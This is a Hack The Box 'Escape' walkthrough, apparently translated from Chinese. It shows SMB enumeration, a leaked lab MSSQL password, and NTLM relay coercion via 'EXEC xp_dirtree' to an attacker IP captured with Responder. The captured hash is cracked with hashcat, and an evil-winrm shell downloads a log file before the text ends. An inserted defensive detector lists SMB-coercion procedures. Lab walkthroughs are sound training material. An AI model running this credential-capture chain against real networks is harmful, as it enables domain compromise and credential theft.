Escape-htb-writeup

0x00 Skills covered by this box

Skills in this chapter: repeated port scans to identify open ports, anonymous SMB access, logging in to the MSSQL database in a domain environment, using EXEC xp_dirtree in MSSQL in a domain environment to obtain a Net-NTLMv2 value, Responder, credential leakage through a .BAK backup file, ADCS exploitation, Certify.exe, certipy-ad, openssl, Rubeus.exe

Reference: https://0xdf.gitlab.io/2023/06/17/htb-escape.html

0x01 Getting user privileges

1. Get the target IP address: 10.10.11.202

2. The port-scan part of this box has problems; I don't know whether it's my network or the configuration of the openvpn I'm connected through. I'll leave it for now: the current scan results are inaccurate and some port information is missing.

┌──(kali㉿offsec)-[~/Desktop]
└─$ sudo nmap -p- --min-rate=10000 10.10.11.202
[sudo] kali 的密码:
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-22 05:35 CST
Nmap scan report for sequel.htb (10.10.11.202)
Host is up (0.24s latency).
Not shown: 65529 filtered tcp ports (no-response)
PORT STATE SERVICE
53/tcp open domain
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3269/tcp open globalcatLDAPssl
9389/tcp open adws

Nmap done: 1 IP address (1 host up) scanned in 22.97 seconds

┌──(kali㉿offsec)-[~/Desktop]
└─$ sudo nmap -p53,135,139,445,3269,9389 -sV -sC 10.10.11.202 --min-rate=10000
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-22 05:36 CST
Nmap scan report for sequel.htb (10.10.11.202)
Host is up (0.36s latency).

PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2024-04-21T21:38:59+00:00; +52s from scanner time.
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc.sequel.htb, DNS:sequel.htb, DNS:sequel
| Not valid before: 2022-11-18T21:05:34
|_Not valid after: 2023-11-18T21:05:34
9389/tcp open mc-nmf .NET Message Framing
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 49s, deviation: 3s, median: 46s
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| smb2-time:
| date: 2024-04-21T21:38:15
|_ start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 90.99 seconds

3. First, add the hosts entries.

┌──(kali㉿offsec)-[~/Desktop]
└─$ echo "10.10.11.202 sequel.htb" | sudo tee -a /etc/hosts
[sudo] kali 的密码:
10.10.11.202 sequel.htb

┌──(kali㉿offsec)-[~/Desktop]
└─$ echo "10.10.11.202 dc.sequel.htb" | sudo tee -a /etc/hosts
10.10.11.202 dc.sequel.htb

4. Over SMB, some shares that allow anonymous access were found.

┌──(kali㉿offsec)-[~/Desktop]
└─$ smbmap -H 10.10.11.202 -u 'guest'

________ ___ ___ _______ ___ ___ __ _______
/" )|" \ /" || _ "\ |" \ /" | /""\ | __ "\
(: \___/ \ \ // |(. |_) :) \ \ // | / \ (. |__) :)
\___ \ /\ \/. ||: \/ /\ \/. | /' /\ \ |: ____/
__/ \ |: \. |(| _ \ |: \. | // __' \ (| /
/" \ :) |. \ /: ||: |_) :)|. \ /: | / / \ \ /|__/ \
(_______/ |___|\__/|___|(_______/ |___|\__/|___|(___/ \___)(_______)
-----------------------------------------------------------------------------
SMBMap - Samba Share Enumerator | Shawn Evans - ShawnDEvans@gmail.com
https://github.com/ShawnDEvans/smbmap

[*] Detected 1 hosts serving SMB
[*] Established 1 SMB session(s)

[+] IP: 10.10.11.202:445 Name: sequel.htb Status: Authenticated
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
IPC$ READ ONLY Remote IPC
NETLOGON NO ACCESS Logon server share
Public READ ONLY
SYSVOL NO ACCESS Logon server share

┌──(kali㉿offsec)-[~/Desktop]
└─$ smbclient -L 10.10.11.202 -N

Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
Public Disk
SYSVOL Disk Logon server share
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.11.202 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available

┌──(kali㉿offsec)-[~/Desktop]
└─$ smbclient \\\\10.10.11.202\\Public -N
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Sat Nov 19 19:51:25 2022
.. D 0 Sat Nov 19 19:51:25 2022
SQL Server Procedures.pdf A 49551 Fri Nov 18 21:39:43 2022

5184255 blocks of size 4096. 1475945 blocks available
smb: \> get "SQL Server Procedures.pdf"
getting file \SQL Server Procedures.pdf of size 49551 as SQL Server Procedures.pdf (34.7 KiloBytes/sec) (average 34.7 KiloBytes/sec)
smb: \> exit

┌──(kali㉿offsec)-[~/Desktop]
└─$ smbclient \\\\10.10.11.202\\SYSVOL -N
Try "help" to get a list of possible commands.
smb: \> ls
NT_STATUS_ACCESS_DENIED listing \*
smb: \> exit

5. The share did contain something: a file named SQL Server Procedures.pdf.

┌──(kali㉿offsec)-[~/Desktop]
└─$ exiftool ./SQL\ Server\ Procedures.pdf
ExifTool Version Number : 12.70
File Name : SQL Server Procedures.pdf
Directory : .
File Size : 50 kB
File Modification Date/Time : 2024:04:22 05:16:12+08:00
File Access Date/Time : 2024:04:22 05:16:12+08:00
File Inode Change Date/Time : 2024:04:22 05:16:12+08:00
File Permissions : -rw-r--r--
File Type : PDF
File Type Extension : pdf
MIME Type : application/pdf
PDF Version : 1.4
Linearized : No
Page Count : 2
Creator : Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) obsidian/0.15.6 Chrome/100.0.4896.160 Electron/18.3.5 Safari/537.36
Producer : Skia/PDF m100
Create Date : 2022:11:18 13:39:43+00:00
Modify Date : 2022:11:18 13:39:43+00:00

6. Reading the PDF reveals a lot of useful information.

Ryan
Tom
brandon.brown

Since last year we have had quite a few incidents with our SQL Servers (looking at you, Ryan: your instance was on the DC, why would you even put a mock instance on the DC?!). So Tom decided to write a basic procedure for accessing the database and then testing any changes to it. Of course none of this is done on the live server; we cloned the DC model onto a dedicated server.

Tom will remove the instance from the DC as soon as he is back from vacation.

The second reason behind this document is that it serves as a guide when no seniors are available to guide the juniors.

From a Domain Joined computer

cmdkey /add:"<serverName>.sequel.htb" /user:"sequel\<userame>" /pass:<password>

brandon.brown@sequel.htb

You can take a peek at the database with the user PublicUser and the password GuestUserCantWrite1.

Refer to the guidelines above and make sure to switch "Windows Authentication" to "SQL Server Authentication".

7. The PDF shows that the credentials above can be used to log in to the database.

┌──(kali㉿offsec)-[~/Desktop]
└─$ impacket-mssqlclient sequel.htb/PublicUser:GuestUserCantWrite1@dc.sequel.htb
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DC\SQLMOCK): Line 1: Changed database context to 'master'.
[*] INFO(DC\SQLMOCK): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (150 7208)
[!] Press help for extra shell commands
SQL (PublicUser guest@master)> SELECT @@version;

------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
Microsoft SQL Server 2019 (RTM) - 15.0.2000.5 (X64)
Sep 24 2019 13:48:23
Copyright (C) 2019 Microsoft Corporation
Express Edition (64-bit) on Windows Server 2019 Standard 10.0 <X64> (Build 17763: ) (Hypervisor)


SQL (PublicUser guest@master)> SELECT name FROM sys.databases;
name
------
master

tempdb

model

msdb

SQL (PublicUser guest@master)>



At this point it is clear these are all just default databases;


SQL (PublicUser guest@master)> select db_name();

------
master

SQL (PublicUser guest@master)> select * from master;
[-] ERROR(DC\SQLMOCK): Line 1: Invalid object name 'master'.
SQL (PublicUser guest@master)> SELECT * FROM master.information_schema.tables;
TABLE_CATALOG TABLE_SCHEMA TABLE_NAME TABLE_TYPE
------------- ------------ ---------------- ----------
master dbo spt_fallback_db b'BASE TABLE'

master dbo spt_fallback_dev b'BASE TABLE'

master dbo spt_fallback_usg b'BASE TABLE'

master dbo spt_values b'VIEW'

master dbo spt_monitor b'BASE TABLE'

SQL (PublicUser guest@master)> select * from spt_fallback_db;
xserver_name xdttm_ins xdttm_last_ins_upd xfallback_dbid name dbid status version
------------ --------- ------------------ -------------- ---- ---- ------ -------
SQL (PublicUser guest@master)> select * from spt_fallback_dev;
xserver_name xdttm_ins xdttm_last_ins_upd xfallback_low xfallback_drive low high status name phyname
------------ --------- ------------------ ------------- --------------- --- ---- ------ ---- -------
SQL (PublicUser guest@master)> select * from spt_fallback_usg;
xserver_name xdttm_ins xdttm_last_ins_upd xfallback_vstart dbid segmap lstart sizepg vstart
------------ --------- ------------------ ---------------- ---- ------ ------ ------ ------
SQL (PublicUser guest@master)>
SQL (PublicUser guest@master)> select * from spt_monitor;
lastrun cpu_busy io_busy idle pack_received pack_sent connections pack_errors total_read total_write total_errors
---------- -------- ------- ---- ------------- --------- ----------- ----------- ---------- ----------- ------------
2019-09-24 14:21:40 30 30 7220 39 39 53 0 0 0 0

8. There is nothing in the database, so the only thing left is to try command execution.

SQL (PublicUser  guest@master)> EXECUTE xp_cmdshell 'whoami';
[-] ERROR(DC\SQLMOCK): Line 1: The EXECUTE permission was denied on the object 'xp_cmdshell', database 'mssqlsystemresource', schema 'sys'.
SQL (PublicUser guest@master)> EXECUTE sp_configure 'show advanced options', 1;
[-] ERROR(DC\SQLMOCK): Line 105: User does not have permission to perform this action.
SQL (PublicUser guest@master)>

9. At this point there is basically nothing left to exploit directly. But because this is a domain environment, there is also an NTLMv2 attack technique: the database holds no useful data and cannot run commands, so the next thing to try is to make the SQL Server connect back to my host and authenticate, capturing a challenge/response that can then be brute-forced offline. Both Querier and "Getting Creds via NTLMv2" demonstrate this. Start Responder as root listening on tun0 for a bunch of services; the only one that matters here is SMB. Then tell MSSQL to read a file from a share on my host:

10. Capture and crack the Net-NTLMv2 hash: start Responder on the Kali machine

SQL (PublicUser  guest@master)> EXEC xp_dirtree '\\10.10.14.38\share', 1, 1
subdirectory depth file
------------ ----- ----
SQL (PublicUser guest@master)>


┌──(kali㉿offsec)-[~/Desktop]
└─$ sudo responder -I tun0
[sudo] kali 的密码:
__
.----.-----.-----.-----.-----.-----.--| |.-----.----.
| _| -__|__ --| _ | _ | | _ || -__| _|
|__| |_____|_____| __|_____|__|__|_____||_____|__|
|__|

NBT-NS, LLMNR & MDNS Responder 3.1.4.0

To support this project:
Github -> https://github.com/sponsors/lgandx
Paypal -> https://paypal.me/PythonResponder

Author: Laurent Gaffie (laurent.gaffie@gmail.com)
To kill this script hit CTRL-C


[+] Poisoners:
LLMNR [ON]
NBT-NS [ON]
MDNS [ON]
DNS [ON]
DHCP [OFF]

[+] Servers:
HTTP server [ON]
HTTPS server [ON]
WPAD proxy [OFF]
Auth proxy [OFF]
SMB server [ON]
Kerberos server [ON]
SQL server [ON]
FTP server [ON]
IMAP server [ON]
POP3 server [ON]
SMTP server [ON]
DNS server [ON]
LDAP server [ON]
MQTT server [ON]
RDP server [ON]
DCE-RPC server [ON]
WinRM server [ON]
SNMP server [OFF]

[+] HTTP Options:
Always serving EXE [OFF]
Serving EXE [OFF]
Serving HTML [OFF]
Upstream Proxy [OFF]

[+] Poisoning Options:
Analyze Mode [OFF]
Force WPAD auth [OFF]
Force Basic Auth [OFF]
Force LM downgrade [OFF]
Force ESS downgrade [OFF]

[+] Generic Options:
Responder NIC [tun0]
Responder IP [10.10.14.38]
Responder IPv6 [dead:beef:2::1024]
Challenge set [random]
Don't Respond To Names ['ISATAP', 'ISATAP.LOCAL']

[+] Current Session Variables:
Responder Machine Name [WIN-8GSNASW7PYB]
Responder Domain Name [MM6H.LOCAL]
Responder DCE-RPC Port [45486]

[+] Listening for events...

[SMB] NTLMv2-SSP Client : 10.10.11.202
[SMB] NTLMv2-SSP Username : sequel\sql_svc
[SMB] NTLMv2-SSP Hash : sql_svc::sequel:0d281f80bb3f3edb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
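The exchange above works because xp_dirtree (executable by the public role by default, which is why PublicUser could call it), xp_fileexist, xp_subdirs, BULK INSERT and OPENROWSET all make the SQL Server service account open an SMB session to whatever host is named in a UNC path, and the service account then authenticates with NTLM to that host. The following is an added example, not code from this writeup or from any of the tools it uses: it takes records of captured statement text (the record layout and field names are an assumption for this example, not a real SQL Server log format) and flags UNC paths that point at raw IP literals, single-label names, or hosts outside a constructed allow-list of file servers.

```python
"""Added example (not from the writeup): flag T-SQL statements that hand a UNC
path on an untrusted host to a procedure that makes SQL Server reach out over
SMB. The records and their field names are constructed for this example and
are not a real SQL Server log format."""
import ipaddress
import re

# Procedures and statements that make the service account open an SMB session
# when given a UNC path (matched case-insensitively against the statement text).
OUTBOUND_SMB_PROCS = ("xp_dirtree", "xp_fileexist", "xp_subdirs",
                      "xp_cmdshell", "bulk insert", "openrowset")

# Two backslashes, then the host part of a UNC path, then a backslash.
UNC_RE = re.compile(r"""\\\\([^\\\s'"]+)\\""")

# Constructed allow-list: file servers the SQL Server is expected to read from.
ALLOWED_FILE_SERVERS = {"fs01.sequel.htb", "dc.sequel.htb"}


def classify_host(host):
    """Return why a UNC host is suspicious, or None if it is an approved server."""
    h = host.lower().rstrip(".")
    if h in ALLOWED_FILE_SERVERS:
        return None
    try:
        ipaddress.ip_address(h)
        return "raw IP literal instead of an approved file server"
    except ValueError:
        pass
    if "." not in h:
        # Single-label names fall back to LLMNR/NBT-NS, which a poisoner answers.
        return "unqualified single-label name"
    return "host not on the approved file-server list"


def detect_forced_auth(records):
    """Return one finding per (statement, suspicious UNC host) pair."""
    findings = []
    for rec in records:
        stmt = rec["statement"]
        low = stmt.lower()
        if not any(proc in low for proc in OUTBOUND_SMB_PROCS):
            continue
        for host in UNC_RE.findall(stmt):
            reason = classify_host(host)
            if reason is None:
                continue
            findings.append({
                "time": rec["time"],
                "login": rec["login"],
                "client": rec["client"],
                "host": host,
                "reason": reason,
                "statement": stmt,
            })
    return findings


# Constructed sample records, shaped like what a session capturing statement
# text might yield. Record 1 mirrors the xp_dirtree call made in this writeup.
SAMPLE_RECORDS = [
    {"time": "2024-04-22 05:40:11", "login": "PublicUser", "client": "10.10.14.38",
     "statement": r"EXEC xp_dirtree '\\10.10.14.38\share', 1, 1"},
    {"time": "2024-04-22 05:41:02", "login": "svc_etl", "client": "10.10.11.50",
     "statement": r"BULK INSERT dbo.staging FROM '\\fs01.sequel.htb\exports\data.csv'"},
    {"time": "2024-04-22 05:42:30", "login": "PublicUser", "client": "10.10.14.38",
     "statement": r"EXEC master..xp_fileexist '\\fileshare\drop\x.txt'"},
    {"time": "2024-04-22 05:43:00", "login": "app_user", "client": "10.10.11.60",
     "statement": "SELECT name FROM sys.databases"},
]

if __name__ == "__main__":
    for f in detect_forced_auth(SAMPLE_RECORDS):
        print(f"{f['time']} login={f['login']} from {f['client']} "
              f"-> host {f['host']}: {f['reason']}")
```

On the sample, the xp_dirtree call to 10.10.14.38 and the xp_fileexist call to the single-label host are reported; the BULK INSERT from the approved file server is not. The two hardening steps this detector complements are revoking EXECUTE on xp_dirtree and xp_fileexist from public on instances that do not need them, and egress-filtering TCP 445 from database servers so the service account cannot authenticate to arbitrary hosts in the first place.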

11. Crack the password

┌──(kali㉿offsec)-[~/Desktop]
└─$ hashcat -h | grep -i "NTLMv2"
5600 | NetNTLMv2 | Network Protocol
27100 | NetNTLMv2 (NT) | Network Protocol

┌──(kali㉿offsec)-[~/Desktop]
└─$ sudo hashcat -m 5600 ./hash /usr/share/wordlists/rockyou.txt
[sudo] kali 的密码:
hashcat (v6.2.6) starting

OpenCL API (OpenCL 3.0 PoCL 5.0+debian Linux, None+Asserts, RELOC, SPIR, LLVM 15.0.7, SLEEF, POCL_DEBUG) - Platform #1 [The pocl project]
==========================================================================================================================================
* Device #1: cpu--0x000, 1439/2942 MB (512 MB allocatable), 4MCU

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Optimizers applied:
* Zero-Byte
* Not-Iterated
* Single-Hash
* Single-Salt

ATTENTION! Pure (unoptimized) backend kernels selected.
Pure kernels can crack longer passwords, but drastically reduce performance.
If you want to switch to optimized kernels, append -O to your commandline.
See the above message to find out about the exact limits.

Watchdog: Temperature abort trigger set to 90c

Host memory required for this attack: 0 MB

Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385

Cracking performance lower than expected?

* Append -O to the commandline.
This lowers the maximum supported password/salt length (usually down to 32).

* Append -w 3 to the commandline.
This can cause your screen to lag.

* Append -S to the commandline.
This has a drastic speed impact but can be better for specific attacks.
Typical scenarios are a small wordlist but a large ruleset.

* Update your backend API runtime / driver the right way:
https://hashcat.net/faq/wrongdriver

* Create more work items to make use of your parallelization power:
https://hashcat.net/faq/morework

SQL_SVC::sequel:0d281f80bb3f3edb:88738d5319cae1701770f4c1ca15c7f4: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:REGGIE1234ronnie

Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 5600 (NetNTLMv2)
Hash.Target......: SQL_SVC::sequel:0d281f80bb3f3edb:88738d5319cae17017...000000
Time.Started.....: Tue Apr 23 05:16:14 2024 (7 secs)
Time.Estimated...: Tue Apr 23 05:16:21 2024 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 1573.5 kH/s (0.57ms) @ Accel:256 Loops:1 Thr:1 Vec:4
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 10700800/14344385 (74.60%)
Rejected.........: 0/10700800 (0.00%)
Restore.Point....: 10699776/14344385 (74.59%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: REJONTE -> REDOCEAN22
Hardware.Mon.#1..: Util: 84%

Started: Tue Apr 23 05:16:14 2024
Stopped: Tue Apr 23 05:16:22 2024

12. Now we have a username and password; next, verify that the credentials work.

┌──(kali㉿offsec)-[~/Desktop]
└─$ crackmapexec smb 10.10.11.202 -u 'sql_svc' -p 'REGGIE1234ronnie' --shares
SMB 10.10.11.202 445 DC [*] Windows 10.0 Build 17763 x64 (name:DC) (domain:sequel.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.202 445 DC [+] sequel.htb\sql_svc:REGGIE1234ronnie
SMB 10.10.11.202 445 DC [+] Enumerated shares
SMB 10.10.11.202 445 DC Share Permissions Remark
SMB 10.10.11.202 445 DC ----- ----------- ------
SMB 10.10.11.202 445 DC ADMIN$ Remote Admin
SMB 10.10.11.202 445 DC C$ Default share
SMB 10.10.11.202 445 DC IPC$ READ Remote IPC
SMB 10.10.11.202 445 DC NETLOGON READ Logon server share
SMB 10.10.11.202 445 DC Public READ
SMB 10.10.11.202 445 DC SYSVOL READ Logon server share

13. Log in with this account and try to enumerate some information.

┌──(kali㉿offsec)-[~/Desktop]
└─$ evil-winrm -i 10.10.11.202 -u sql_svc -p 'REGGIE1234ronnie'

Evil-WinRM shell v3.5

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\sql_svc\Documents> whoami
sequel\sql_svc
*Evil-WinRM* PS C:\Users\sql_svc\Documents> dir C:\Users


Directory: C:\Users


Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 2/7/2023 8:58 AM Administrator
d-r--- 7/20/2021 12:23 PM Public
d----- 2/1/2023 6:37 PM Ryan.Cooper
d----- 2/7/2023 8:10 AM sql_svc


*Evil-WinRM* PS C:\Users\sql_svc\Documents>


*Evil-WinRM* PS C:\Users\sql_svc\Documents> cd C:/
*Evil-WinRM* PS C:\> ls


Directory: C:\


Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 2/1/2023 8:15 PM PerfLogs
d-r--- 2/6/2023 12:08 PM Program Files
d----- 11/19/2022 3:51 AM Program Files (x86)
d----- 11/19/2022 3:51 AM Public
d----- 2/1/2023 1:02 PM SQLServer
d-r--- 2/1/2023 1:55 PM Users
d----- 2/6/2023 7:21 AM Windows


*Evil-WinRM* PS C:\> cd SQLServer
*Evil-WinRM* PS C:\SQLServer> ls


Directory: C:\SQLServer


Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 2/7/2023 8:06 AM Logs
d----- 11/18/2022 1:37 PM SQLEXPR_2019
-a---- 11/18/2022 1:35 PM 6379936 sqlexpress.exe
-a---- 11/18/2022 1:36 PM 268090448 SQLEXPR_x64_ENU.exe


*Evil-WinRM* PS C:\SQLServer> cd Logs
*Evil-WinRM* PS C:\SQLServer\Logs> ls


Directory: C:\SQLServer\Logs


Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 2/7/2023 8:06 AM 27608 ERRORLOG.BAK


*Evil-WinRM* PS C:\SQLServer\Logs> download ERRORLOG.BAK

Info: Downloading C:\SQLServer\Logs\ERRORLOG.BAK to ERRORLOG.BAK

Info: Download successful!
*Evil-WinRM* PS C:\SQLServer\Logs>

14. During enumeration a suspicious file was found and downloaded; now analyze it.

┌──(kali㉿offsec)-[~/Desktop]
└─$ file ERRORLOG.BAK
ERRORLOG.BAK: Unicode text, UTF-16, little-endian text, with very long lines (508), with CRLF line terminators

┌──(kali㉿offsec)-[~/Desktop]
└─$ cat ERRORLOG.BAK
2022-11-18 13:43:05.96 Server Microsoft SQL Server 2019 (RTM) - 15.0.2000.5 (X64)
Sep 24 2019 13:48:23
Copyright (C) 2019 Microsoft Corporation
Express Edition (64-bit) on Windows Server 2019 Standard Evaluation 10.0 <X64> (Build 17763: ) (Hypervisor)

2022-11-18 13:43:05.97 Server UTC adjustment: -8:00
2022-11-18 13:43:05.97 Server (c) Microsoft Corporation.
2022-11-18 13:43:05.97 Server All rights reserved.
2022-11-18 13:43:05.97 Server Server process ID is 3788.
2022-11-18 13:43:05.97 Server System Manufacturer: 'VMware, Inc.', System Model: 'VMware7,1'.
2022-11-18 13:43:05.97 Server Authentication mode is MIXED.
2022-11-18 13:43:05.97 Server Logging SQL Server messages in file 'C:\Program Files\Microsoft SQL Server\MSSQL15.SQLMOCK\MSSQL\Log\ERRORLOG'.
2022-11-18 13:43:05.97 Server The service account is 'NT Service\MSSQL$SQLMOCK'. This is an informational message; no user action is required.
2022-11-18 13:43:05.97 Server Registry startup parameters:
-d C:\Program Files\Microsoft SQL Server\MSSQL15.SQLMOCK\MSSQL\DATA\master.mdf
-e C:\Program Files\Microsoft SQL Server\MSSQL15.SQLMOCK\MSSQL\Log\ERRORLOG
-l C:\Program Files\Microsoft SQL Server\MSSQL15.SQLMOCK\MSSQL\DATA\mastlog.ldf
2022-11-18 13:43:05.97 Server Command Line Startup Parameters:
-s "SQLMOCK"
-m "SqlSetup"
-Q
-q "SQL_Latin1_General_CP1_CI_AS"
-T 4022
-T 4010
-T 3659
-T 3610
-T 8015
2022-11-18 13:43:05.97 Server SQL Server detected 1 sockets with 1 cores per socket and 1 logical processors per socket, 1 total logical processors; using 1 logical processors based on SQL Server licensing. This is an informational message; no user action is required.
2022-11-18 13:43:05.97 Server SQL Server is starting at normal priority base (=7). This is an informational message only. No user action is required.
2022-11-18 13:43:05.97 Server Detected 2046 MB of RAM. This is an informational message; no user action is required.
2022-11-18 13:43:05.97 Server Using conventional memory in the memory manager.
2022-11-18 13:43:05.97 Server Page exclusion bitmap is enabled.
2022-11-18 13:43:05.98 Server Buffer Pool: Allocating 262144 bytes for 166158 hashPages.
2022-11-18 13:43:06.01 Server Default collation: SQL_Latin1_General_CP1_CI_AS (us_english 1033)
2022-11-18 13:43:06.04 Server Buffer pool extension is already disabled. No action is necessary.
2022-11-18 13:43:06.06 Server Perfmon counters for resource governor pools and groups failed to initialize and are disabled.
2022-11-18 13:43:06.07 Server Query Store settings initialized with enabled = 1,
2022-11-18 13:43:06.07 Server This instance of SQL Server last reported using a process ID of 5116 at 11/18/2022 1:43:04 PM (local) 11/18/2022 9:43:04 PM (UTC). This is an informational message only; no user action is required.
2022-11-18 13:43:06.07 Server Node configuration: node 0: CPU mask: 0x0000000000000001:0 Active CPU mask: 0x0000000000000001:0. This message provides a description of the NUMA configuration for this computer. This is an informational message only. No user action is required.
2022-11-18 13:43:06.07 Server Using dynamic lock allocation. Initial allocation of 2500 Lock blocks and 5000 Lock Owner blocks per node. This is an informational message only. No user action is required.
2022-11-18 13:43:06.08 Server In-Memory OLTP initialized on lowend machine.
2022-11-18 13:43:06.08 Server The maximum number of dedicated administrator connections for this instance is '1'
2022-11-18 13:43:06.09 Server [INFO] Created Extended Events session 'hkenginexesession'

2022-11-18 13:43:06.09 Server Database Instant File Initialization: disabled. For security and performance considerations see the topic 'Database Instant File Initialization' in SQL Server Books Online. This is an informational message only. No user action is required.
2022-11-18 13:43:06.10 Server CLR version v4.0.30319 loaded.
2022-11-18 13:43:06.10 Server Total Log Writer threads: 1. This is an informational message; no user action is required.
2022-11-18 13:43:06.13 Server Database Mirroring Transport is disabled in the endpoint configuration.
2022-11-18 13:43:06.13 Server clflushopt is selected for pmem flush operation.
2022-11-18 13:43:06.14 Server Software Usage Metrics is disabled.
2022-11-18 13:43:06.14 spid9s Warning ******************
2022-11-18 13:43:06.36 spid9s SQL Server started in single-user mode. This an informational message only. No user action is required.
2022-11-18 13:43:06.36 Server Common language runtime (CLR) functionality initialized using CLR version v4.0.30319 from C:\Windows\Microsoft.NET\Framework64\v4.0.30319\.
2022-11-18 13:43:06.37 spid9s Starting up database 'master'.
2022-11-18 13:43:06.38 spid9s The tail of the log for database master is being rewritten to match the new sector size of 4096 bytes. 2048 bytes at offset 419840 in file C:\Program Files\Microsoft SQL Server\MSSQL15.SQLMOCK\MSSQL\DATA\mastlog.ldf will be written.
2022-11-18 13:43:06.39 spid9s Converting database 'master' from version 897 to the current version 904.
2022-11-18 13:43:06.39 spid9s Database 'master' running the upgrade step from version 897 to version 898.
2022-11-18 13:43:06.40 spid9s Database 'master' running the upgrade step from version 898 to version 899.
2022-11-18 13:43:06.41 spid9s Database 'master' running the upgrade step from version 899 to version 900.
2022-11-18 13:43:06.41 spid9s Database 'master' running the upgrade step from version 900 to version 901.
2022-11-18 13:43:06.41 spid9s Database 'master' running the upgrade step from version 901 to version 902.
2022-11-18 13:43:06.52 spid9s Database 'master' running the upgrade step from version 902 to version 903.
2022-11-18 13:43:06.52 spid9s Database 'master' running the upgrade step from version 903 to version 904.
2022-11-18 13:43:06.72 spid9s SQL Server Audit is starting the audits. This is an informational message. No user action is required.
2022-11-18 13:43:06.72 spid9s SQL Server Audit has started the audits. This is an informational message. No user action is required.
2022-11-18 13:43:06.74 spid9s SQL Trace ID 1 was started by login "sa".
2022-11-18 13:43:06.74 spid9s Server name is 'DC\SQLMOCK'. This is an informational message only. No user action is required.
2022-11-18 13:43:06.75 spid14s Starting up database 'mssqlsystemresource'.
2022-11-18 13:43:06.75 spid9s Starting up database 'msdb'.
2022-11-18 13:43:06.75 spid18s Password policy update was successful.
2022-11-18 13:43:06.76 spid14s The resource database build version is 15.00.2000. This is an informational message only. No user action is required.
2022-11-18 13:43:06.78 spid9s The tail of the log for database msdb is being rewritten to match the new sector size of 4096 bytes. 3072 bytes at offset 50176 in file C:\Program Files\Microsoft SQL Server\MSSQL15.SQLMOCK\MSSQL\DATA\MSDBLog.ldf will be written.
2022-11-18 13:43:06.78 spid9s Converting database 'msdb' from version 897 to the current version 904.
2022-11-18 13:43:06.78 spid9s Database 'msdb' running the upgrade step from version 897 to version 898.
2022-11-18 13:43:06.79 spid14s Starting up database 'model'.
2022-11-18 13:43:06.79 spid9s Database 'msdb' running the upgrade step from version 898 to version 899.
2022-11-18 13:43:06.80 spid14s The tail of the log for database model is being rewritten to match the new sector size of 4096 bytes. 512 bytes at offset 73216 in file C:\Program Files\Microsoft SQL Server\MSSQL15.SQLMOCK\MSSQL\DATA\modellog.ldf will be written.
2022-11-18 13:43:06.80 spid9s Database 'msdb' running the upgrade step from version 899 to version 900.
2022-11-18 13:43:06.81 spid14s Converting database 'model' from version 897 to the current version 904.
2022-11-18 13:43:06.81 spid14s Database 'model' running the upgrade step from version 897 to version 898.
2022-11-18 13:43:06.81 spid9s Database 'msdb' running the upgrade step from version 900 to version 901.
2022-11-18 13:43:06.81 spid14s Database 'model' running the upgrade step from version 898 to version 899.
2022-11-18 13:43:06.81 spid9s Database 'msdb' running the upgrade step from version 901 to version 902.
2022-11-18 13:43:06.82 spid14s Database 'model' running the upgrade step from version 899 to version 900.
2022-11-18 13:43:06.88 spid18s A self-generated certificate was successfully loaded for encryption.
2022-11-18 13:43:06.88 spid18s Server local connection provider is ready to accept connection on [ \\.\pipe\SQLLocal\SQLMOCK ].
2022-11-18 13:43:06.88 spid18s Dedicated administrator connection support was not started because it is disabled on this edition of SQL Server. If you want to use a dedicated administrator connection, restart SQL Server using the trace flag 7806. This is an informational message only. No user action is required.
